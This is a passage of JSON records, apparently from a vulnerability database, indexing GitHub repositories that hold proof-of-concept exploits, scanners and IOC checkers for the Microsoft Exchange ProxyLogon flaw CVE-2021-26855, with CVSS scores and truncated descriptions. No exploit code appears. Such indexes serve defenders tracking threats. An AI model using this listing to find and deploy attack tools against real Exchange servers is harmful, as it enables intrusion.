"description": "# CVE-2021-26855 e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T10:45:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-01-07T03:32:12", "id": "91C28663-6C3C-5E4F-B609-44E5804E4A83", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:17", "description": "# CVE-2021-26855-SSRF-Poc\nThis script helps to identify CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-06T19:03:00", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-15T14:41:36", "id": "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:17", "description": "# ProxyLogon-CVE-2021-26855\nRCE exploit for ProxyLogon vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T22:57:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-11-25T15:13:15", "id": "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-30T00:12:02", "description": "# CVE-2021-26855-Scanner\nScanner and PoC for CVE-2021-26855 \n\nCr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-12T12:47:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-29T15:00:52", "id": "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:35:48", "description": "# ProxyLogon-CVE-2021-26855-metasploit\nCVE-2021-26855 proxyLogon...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-17T03:32:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-15T14:41:40", "id": "9E82678F-0559-56B2-94DC-6505FE64555C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:10", "description": "**Basic usage: `python owamails.py -u <url> -l <users.txt> -p <p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T14:03:16", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-09-14T06:23:54", "id": "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:27", "description": "# ExchangeWeaknessTest\n\nThis script test the CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T09:40:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-09T09:43:55", "id": "7758268F-2004-536A-B51F-62DA1E5A992D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:49", "description": "# hafnium-exchange-splunk-csvs\nIOCs (IP addresses, hashes of web...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T00:11:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-07-27T21:19:37", "id": "256984DC-A742-53F8-889F-2071EC134734", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:30", "description": "# CVE-2021-26855-SSRF-Exchange\nCVE-2021-26855 SSRF Exchange Serv...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-07T00:55:16", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-15T14:41:36", "id": "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:41", "description": "# Microsoft_Exchange_Server_SSRF_CVE-2021-26855\n\n**zoomeye dork\uff1a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-06T09:15:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-12-15T14:41:36", "id": "7F4F3321-8955-51B4-B195-7C1F647A6C84", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-17T04:50:23", "description": "# SharpProxyLogon\n\nC# POC for the ProxyLogon chained RCE\n\n```\n _...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T21:10:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-06-17T03:05:38", "id": "18D647E9-D7D4-5591-B16C-05D007AFD726", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-21T17:13:31", "description": "# proxylogon\nmy exploit for the proxylogon chain (Microsoft Exch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-14T13:04:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-06-21T16:41:26", "id": "7C80631A-74CB-54F0-BC26-01EEF7D52760", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-12T15:58:24", "description": "# CVE-2021-26855_Exchange RCE\n\n> **\u672c\u6587\u4ee5\u53ca\u5de5\u5177...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T00:44:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-06-12T12:54:34", "id": "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-24T19:57:41", "description": "# proxylogon\nmy exploit for the proxylogon chain (Microsoft Exch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:42:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-06-24T17:42:46", "id": "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-05T08:44:14", "description": "# CVE-2021-26855\nPoC for CVE-2021-26855 -Just a checker-\n\n# Usag...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T23:12:22", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-05T07:21:07", "id": "13364575-934B-5E73-AA03-AEB6910F6AD2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-04T19:26:23", "description": "# CVE-2021-26855\nPoC of proxylogon chain SSRF(CVE-2021-26855) to...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T20:51:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-04T16:10:52", "id": "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-03T19:26:17", "description": "# CVE-2021-26855_PoC\nMy early SSRF payloads (CVE-2021-26855) ove...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:21:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-03T15:31:37", "id": "3019C843-FE2F-527C-B7C1-14A1C3066721", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:57", "description": "Disclaimer: All the information provided in this repository is f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T10:14:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-03-24T16:54:40", "id": "7275794A-F2F6-51E6-B514-185E494D8A3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 